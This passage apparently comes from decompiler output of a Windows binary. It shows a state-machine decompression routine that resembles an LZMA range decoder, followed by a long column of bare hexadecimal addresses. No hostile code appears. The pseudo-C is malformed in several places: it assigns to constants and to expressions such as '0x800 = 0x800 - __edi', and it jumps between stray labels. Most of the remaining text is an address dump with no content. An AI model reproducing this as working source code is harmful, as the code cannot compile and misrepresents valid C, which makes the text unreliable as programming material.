									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                                    0x00405f92
                                                                                                    0x00405f99
                                                                                                    0x00405f9f
                                                                                                    0x00405fa5
                                                                                                    0x00000000
                                                                                                    0x00405fa9
                                                                                                    0x00405fb5
                                                                                                    0x00405fb5
                                                                                                    0x00405fb5
                                                                                                    0x00405fbe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x00000000
                                                                                                    0x00405fcb
                                                                                                    0x00405fcf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fd8
                                                                                                    0x00405fdb
                                                                                                    0x00405fde
                                                                                                    0x00405fe0
                                                                                                    0x00405fe2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fe8
                                                                                                    0x00405feb
                                                                                                    0x00405fed
                                                                                                    0x00405fee
                                                                                                    0x00405ff1
                                                                                                    0x00405ff3
                                                                                                    0x00405ff4
                                                                                                    0x00405ff6
                                                                                                    0x00405ff9
                                                                                                    0x00405ffe
                                                                                                    0x00406003
                                                                                                    0x0040600c
                                                                                                    0x0040601f
                                                                                                    0x00406022
                                                                                                    0x0040602b
                                                                                                    0x0040602e
                                                                                                    0x00406056
                                                                                                    0x00406056
                                                                                                    0x00406058
                                                                                                    0x00406066
                                                                                                    0x00406066
                                                                                                    0x0040606a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x0040605a
                                                                                                    0x0040605d
                                                                                                    0x0040605d
                                                                                                    0x0040605e
                                                                                                    0x0040605e
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x00406030
                                                                                                    0x00406034
                                                                                                    0x00406039
                                                                                                    0x00406039
                                                                                                    0x00406042
                                                                                                    0x00406048
                                                                                                    0x0040604a
                                                                                                    0x0040604d
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406070
                                                                                                    0x00406070
                                                                                                    0x00406074
                                                                                                    0x00406920
                                                                                                    0x00000000
                                                                                                    0x00406920
                                                                                                    0x0040607d
                                                                                                    0x0040608d
                                                                                                    0x00406090
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406096
                                                                                                    0x00406096
                                                                                                    0x0040609a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040609c
                                                                                                    0x0040609f
                                                                                                    0x004060a2
                                                                                                    0x004060cc
                                                                                                    0x004060d2
                                                                                                    0x004060d9
                                                                                                    0x00000000
                                                                                                    0x004060d9
                                                                                                    0x004060a4
                                                                                                    0x004060a8
                                                                                                    0x004060ab
                                                                                                    0x004060b0
                                                                                                    0x004060b0
                                                                                                    0x004060bb
                                                                                                    0x004060c1
                                                                                                    0x004060c3
                                                                                                    0x004060c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040610b
                                                                                                    0x00406111
                                                                                                    0x00406114
                                                                                                    0x00406121
                                                                                                    0x00406129
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004060e0
                                                                                                    0x004060e0
                                                                                                    0x004060e4
                                                                                                    0x0040692f
                                                                                                    0x00000000
                                                                                                    0x0040692f
                                                                                                    0x004060f0
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fe
                                                                                                    0x00406101
                                                                                                    0x00406104
                                                                                                    0x00406107
                                                                                                    0x00406109
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004067a0
                                                                                                    0x004067a0
                                                                                                    0x004067a6
                                                                                                    0x004067ac
                                                                                                    0x004067af
                                                                                                    0x004067b2
                                                                                                    0x004067cc
                                                                                                    0x004067cf
                                                                                                    0x004067d5
                                                                                                    0x004067e0
                                                                                                    0x004067e0
                                                                                                    0x004067e2
                                                                                                    0x004067b4
                                                                                                    0x004067b4
                                                                                                    0x004067c3
                                                                                                    0x004067c7
                                                                                                    0x004067c7
                                                                                                    0x004067e5
                                                                                                    0x004067ec
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004067ee
                                                                                                    0x004067ee
                                                                                                    0x004067f2
                                                                                                    0x004069a1
                                                                                                    0x00000000
                                                                                                    0x004069a1
                                                                                                    0x004067fe
                                                                                                    0x00406805
                                                                                                    0x0040680d
                                                                                                    0x0040680d
                                                                                                    0x0040680d
                                                                                                    0x00406810
                                                                                                    0x00406813
                                                                                                    0x00406813
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406131
                                                                                                    0x00406133
                                                                                                    0x00406136
                                                                                                    0x004061a7
                                                                                                    0x004061aa
                                                                                                    0x004061ad
                                                                                                    0x004061b4
                                                                                                    0x004061be
                                                                                                    0x00000000
                                                                                                    0x004061be
                                                                                                    0x00406138
                                                                                                    0x0040613c
                                                                                                    0x0040613f
                                                                                                    0x00406141
                                                                                                    0x00406144
                                                                                                    0x00406147
                                                                                                    0x00406149
                                                                                                    0x0040614c
                                                                                                    0x0040614e
                                                                                                    0x00406153
                                                                                                    0x00406156
                                                                                                    0x00406159
                                                                                                    0x0040615d
                                                                                                    0x00406164
                                                                                                    0x00406167
                                                                                                    0x0040616e
                                                                                                    0x00406172
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x0040617e
                                                                                                    0x00406181
                                                                                                    0x0040619f
                                                                                                    0x004061a1
                                                                                                    0x00000000
                                                                                                    0x004061a1
                                                                                                    0x00406183
                                                                                                    0x00406186
                                                                                                    0x00406189
                                                                                                    0x0040618c
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x00406191
                                                                                                    0x00406194
                                                                                                    0x00406196
                                                                                                    0x00406197
                                                                                                    0x0040619a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004063d0
                                                                                                    0x004063d4
                                                                                                    0x004063f2
                                                                                                    0x004063f5
                                                                                                    0x004063fc
                                                                                                    0x004063ff
                                                                                                    0x00406402
                                                                                                    0x00406405
                                                                                                    0x00406408
                                                                                                    0x0040640b
                                                                                                    0x0040640d
                                                                                                    0x00406414
                                                                                                    0x00406415
                                                                                                    0x00406417
                                                                                                    0x0040641a
                                                                                                    0x0040641d
                                                                                                    0x00406420
                                                                                                    0x00406420
                                                                                                    0x00406425
                                                                                                    0x00000000
                                                                                                    0x00406425
                                                                                                    0x004063d6
                                                                                                    0x004063d9
                                                                                                    0x004063dc
                                                                                                    0x004063e6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040643a
                                                                                                    0x0040643e
                                                                                                    0x00406461
                                                                                                    0x00406464
                                                                                                    0x00406467
                                                                                                    0x00406471
                                                                                                    0x00406440
                                                                                                    0x00406440
                                                                                                    0x00406443
                                                                                                    0x00406446
                                                                                                    0x00406449
                                                                                                    0x00406456
                                                                                                    0x00406459
                                                                                                    0x00406459
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040647d
                                                                                                    0x00406481
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406487
                                                                                                    0x0040648b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406491
                                                                                                    0x00406493
                                                                                                    0x00406497
                                                                                                    0x00406497
                                                                                                    0x0040649a
                                                                                                    0x0040649e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064ee
                                                                                                    0x004064f2
                                                                                                    0x004064f9
                                                                                                    0x004064fc
                                                                                                    0x004064ff
                                                                                                    0x00406509
                                                                                                    0x00000000
                                                                                                    0x00406509
                                                                                                    0x004064f4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406515
                                                                                                    0x00406519
                                                                                                    0x00406520
                                                                                                    0x00406523
                                                                                                    0x00406526
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x00406529
                                                                                                    0x0040652c
                                                                                                    0x0040652f
                                                                                                    0x0040652f
                                                                                                    0x00406532
                                                                                                    0x00406535
                                                                                                    0x00406538
                                                                                                    0x00406538
                                                                                                    0x0040653b
                                                                                                    0x00406542
                                                                                                    0x00406547
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004065d5
                                                                                                    0x004065d5
                                                                                                    0x004065d9
                                                                                                    0x00406977
                                                                                                    0x00000000
                                                                                                    0x00406977
                                                                                                    0x004065df
                                                                                                    0x004065e2
                                                                                                    0x004065e5
                                                                                                    0x004065e9
                                                                                                    0x004065ec
                                                                                                    0x004065f2
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f7
                                                                                                    0x004065fa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061ca
                                                                                                    0x004061ca
                                                                                                    0x004061ce
                                                                                                    0x0040693b
                                                                                                    0x00000000
                                                                                                    0x0040693b
                                                                                                    0x004061d4
                                                                                                    0x004061d7
                                                                                                    0x004061da
                                                                                                    0x004061de
                                                                                                    0x004061e1
                                                                                                    0x004061e7
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061ec
                                                                                                    0x004061ef
                                                                                                    0x004061ef
                                                                                                    0x004061f2
                                                                                                    0x004061f5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061fb
                                                                                                    0x00406201
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406207
                                                                                                    0x00406207
                                                                                                    0x0040620b
                                                                                                    0x0040620e
                                                                                                    0x00406211
                                                                                                    0x00406214
                                                                                                    0x00406217
                                                                                                    0x00406218
                                                                                                    0x0040621b
                                                                                                    0x0040621d
                                                                                                    0x00406223
                                                                                                    0x00406226
                                                                                                    0x00406229
                                                                                                    0x0040622c
                                                                                                    0x0040622f
                                                                                                    0x00406232
                                                                                                    0x00406235
                                                                                                    0x00406251
                                                                                                    0x00406254
                                                                                                    0x00406257
                                                                                                    0x0040625a
                                                                                                    0x00406261
                                                                                                    0x00406265
                                                                                                    0x00406267
                                                                                                    0x0040626b
                                                                                                    0x00406237
                                                                                                    0x00406237
                                                                                                    0x0040623b
                                                                                                    0x00406243
                                                                                                    0x00406248
                                                                                                    0x0040624a
                                                                                                    0x0040624c
                                                                                                    0x0040624c
                                                                                                    0x0040626e
                                                                                                    0x00406275
                                                                                                    0x00406278
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x00406283
                                                                                                    0x00406283
                                                                                                    0x00406287
                                                                                                    0x00406947
                                                                                                    0x00000000
                                                                                                    0x00406947
                                                                                                    0x0040628d
                                                                                                    0x00406290
                                                                                                    0x00406293
                                                                                                    0x00406297
                                                                                                    0x0040629a
                                                                                                    0x004062a0
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a5
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062ae
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004062b0
                                                                                                    0x004062b3
                                                                                                    0x004062b6
                                                                                                    0x004062b9
                                                                                                    0x004062bc
                                                                                                    0x004062bf
                                                                                                    0x004062c2
                                                                                                    0x004062c5
                                                                                                    0x004062c8
                                                                                                    0x004062cb
                                                                                                    0x004062ce
                                                                                                    0x004062e6
                                                                                                    0x004062e9
                                                                                                    0x004062ec
                                                                                                    0x004062ef
                                                                                                    0x004062ef
                                                                                                    0x004062f2
                                                                                                    0x004062f6
                                                                                                    0x004062f8
                                                                                                    0x004062d0
                                                                                                    0x004062d0
                                                                                                    0x004062d8
                                                                                                    0x004062dd
                                                                                                    0x004062df
                                                                                                    0x004062e1
                                                                                                    0x004062e1
                                                                                                    0x004062fb
                                                                                                    0x00406302
                                                                                                    0x00406305
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00406305
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406347
                                                                                                    0x00406347
                                                                                                    0x0040634b
                                                                                                    0x00406953
                                                                                                    0x00000000
                                                                                                    0x00406953
                                                                                                    0x00406351
                                                                                                    0x00406354
                                                                                                    0x00406357
                                                                                                    0x0040635b
                                                                                                    0x0040635e
                                                                                                    0x00406364
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406369
                                                                                                    0x0040636c
                                                                                                    0x0040636c
                                                                                                    0x00406372
                                                                                                    0x00406310
                                                                                                    0x00406310
                                                                                                    0x00406313
                                                                                                    0x00000000
                                                                                                    0x00406313
                                                                                                    0x00406374
                                                                                                    0x00406374
                                                                                                    0x00406377
                                                                                                    0x0040637a
                                                                                                    0x0040637d
                                                                                                    0x00406380
                                                                                                    0x00406383
                                                                                                    0x00406386
                                                                                                    0x00406389
                                                                                                    0x0040638c
                                                                                                    0x0040638f
                                                                                                    0x00406392
                                                                                                    0x004063aa
                                                                                                    0x004063ad
                                                                                                    0x004063b0
                                                                                                    0x004063b3
                                                                                                    0x004063b3
                                                                                                    0x004063b6
                                                                                                    0x004063ba
                                                                                                    0x004063bc
                                                                                                    0x00406394
                                                                                                    0x00406394
                                                                                                    0x0040639c
                                                                                                    0x004063a1
                                                                                                    0x004063a3
                                                                                                    0x004063a5
                                                                                                    0x004063a5
                                                                                                    0x004063bf
                                                                                                    0x004063c6
                                                                                                    0x004063c9
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x00406658
                                                                                                    0x00406658
                                                                                                    0x0040665c
                                                                                                    0x00406983
                                                                                                    0x00000000
                                                                                                    0x00406983
                                                                                                    0x00406662
                                                                                                    0x00406665
                                                                                                    0x00406668
                                                                                                    0x0040666c
                                                                                                    0x0040666f
                                                                                                    0x00406675
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x0040667a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406428
                                                                                                    0x00406428
                                                                                                    0x0040642b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406767
                                                                                                    0x0040676b
                                                                                                    0x0040678d
                                                                                                    0x00406790
                                                                                                    0x0040679a
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x0040676d
                                                                                                    0x00406770
                                                                                                    0x00406774
                                                                                                    0x00406777
                                                                                                    0x00406777
                                                                                                    0x0040677a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406824
                                                                                                    0x00406828
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x0040684d
                                                                                                    0x00406854
                                                                                                    0x0040685b
                                                                                                    0x0040685b
                                                                                                    0x00000000
                                                                                                    0x0040685b
                                                                                                    0x0040682a
                                                                                                    0x0040682d
                                                                                                    0x00406830
                                                                                                    0x00406833
                                                                                                    0x0040683a
                                                                                                    0x0040677e
                                                                                                    0x0040677e
                                                                                                    0x00406781
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406915
                                                                                                    0x00406918
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040654f
                                                                                                    0x00406551
                                                                                                    0x00406558
                                                                                                    0x00406559
                                                                                                    0x0040655b
                                                                                                    0x0040655e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406566
                                                                                                    0x00406569
                                                                                                    0x0040656c
                                                                                                    0x0040656e
                                                                                                    0x00406570
                                                                                                    0x00406570
                                                                                                    0x00406571
                                                                                                    0x00406574
                                                                                                    0x0040657b
                                                                                                    0x0040657e
                                                                                                    0x0040658c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406862
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406871
                                                                                                    0x00406871
                                                                                                    0x00406875
                                                                                                    0x004069ad
                                                                                                    0x00000000
                                                                                                    0x004069ad
                                                                                                    0x0040687b
                                                                                                    0x0040687e
                                                                                                    0x00406881
                                                                                                    0x00406885
                                                                                                    0x00406888
                                                                                                    0x0040688e
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406893
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406899
                                                                                                    0x00406899
                                                                                                    0x0040689d
                                                                                                    0x004068fd
                                                                                                    0x00406900
                                                                                                    0x00406905
                                                                                                    0x00406906
                                                                                                    0x00406908
                                                                                                    0x0040690a
                                                                                                    0x0040690d
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x00406819
                                                                                                    0x0040689f
                                                                                                    0x004068a5
                                                                                                    0x004068a8
                                                                                                    0x004068ab
                                                                                                    0x004068ae
                                                                                                    0x004068b1
                                                                                                    0x004068b4
                                                                                                    0x004068b7
                                                                                                    0x004068ba
                                                                                                    0x004068bd
                                                                                                    0x004068c0
                                                                                                    0x004068d9
                                                                                                    0x004068dc
                                                                                                    0x004068df
                                                                                                    0x004068e2
                                                                                                    0x004068e6
                                                                                                    0x004068e8
